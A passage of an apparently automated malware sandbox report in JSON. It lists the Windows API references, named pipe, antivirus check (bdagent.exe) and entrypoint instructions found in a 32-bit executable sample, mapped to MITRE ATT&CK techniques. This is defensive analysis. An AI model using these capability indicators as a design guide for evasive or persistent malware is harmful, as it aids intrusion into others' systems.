00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CharUpperA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateWindowExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"DestroyIcon\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"DestroyWindow\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"DispatchMessageA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnableWindow\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindWindowExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClassNameA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClientRect\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetMessageA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSysColor\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemMetrics\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindow\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowLongA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowRect\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowTextA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadIconA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadStringA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"MapWindowPoints\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OemToCharA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OemToCharBuffA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"PeekMessageA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"PostMessageA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SendMessageA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFocus\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetMenu\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetWindowLongA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetWindowPos\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetWindowTextA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"TranslateMessage\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"wvsprintfA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"lstrcatA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"ZwQuerySystemInformation\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetReadFileExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetSetStatusCallback\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"MmGetSystemRoutineAddress\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"Thread32First\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"PathFileExistsA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"WSAAddressToStringA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"WNetCancelConnection2A\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"WNetAddConnection2A\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"WNetCloseEnum\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"WNetOpenEnumA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"UuidToStringA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"UuidFromStringA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FreeResource\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SizeofResource\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"LockResource\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"lstrcpyA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"VirtualQuery\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetEvent\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"MapViewOfFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitThread\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CopyFileA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateFileMappingA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"WinExec\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetVersion\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeviceIoControl\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"lstrcpynA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetDriveTypeA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetExitCodeProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"RemoveDirectoryA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetNamedPipeHandleState\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FlushViewOfFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"TerminateThread\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetExitCodeThread\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"TransactNamedPipe\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalAlloc\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GlobalFree\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLocalTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreatePipe\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLogicalDrives\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"ConnectNamedPipe\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"Thread32Next\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"DisconnectNamedPipe\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateNamedPipeA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenThread\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"PostThreadMessageA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetThreadDesktop\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenWindowStationA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenDesktopA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetProcessWindowStation\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenServiceA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseServiceHandle\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateServiceA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"StartServiceA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"QueryServiceStatus\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenSCManagerA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"ControlService\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateProcessAsUserA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SHGetSpecialFolderPathA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FlsFree\"; Source: \"00000000-00005280.00000001.138657.00640000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" file has an entrypoint instructions - \"jmp\t0x40229c,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,nop\t,nop\t,nop\t,push\t0,push\t0x401069,push\t0,push\t0x41210c,push\tdword ptr [0x413eec],call\t0x410fa2,cmp\tdword ptr [0x4126c8], 0,jne\t0x401049,cmp\tdword ptr [0x4126d4], 0,jne\t0x401049,mov\tecx, 3,mov\tedx, dword ptr [0x412044],xor\teax, eax,call\t0x40174a,cmp\tbyte ptr [0x412041], 0,je\t0x401057,call\t0x40216e,mov\teax, 0x412ee4,mov\tecx, 0x80,xor\tedx, edx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-269", "type": 2, "relevance": 1, "name": "Contains reference to method used by Windows shell items (API string)", "description": "Found reference to API \"SHFileOperationA\" (Indicator: \"SHFileOperation\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SHFileOperationA\" (Indicator: \"SHFileOperation\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-8", "type": 2, "relevance": 2, "name": "Possibly checks for the presence of an Antivirus engine", "description": "\"bdagent.exe\" (Indicator: \"bdagent\") in Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c", "origin": "File/Memory", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-146", "type": 2, "relevance": 1, "name": "Found named pipe like strings", "description": "Found string - \\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A", "origin": "File/Memory", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"OpenThread\" (Indicator: \"OpenThread\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"OpenThread\" (Indicator: \"OpenThread\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-242", "type": 2, "relevance": 1, "name": "Contains ability to close a handle to a service (API string)", "description": "Found reference to API 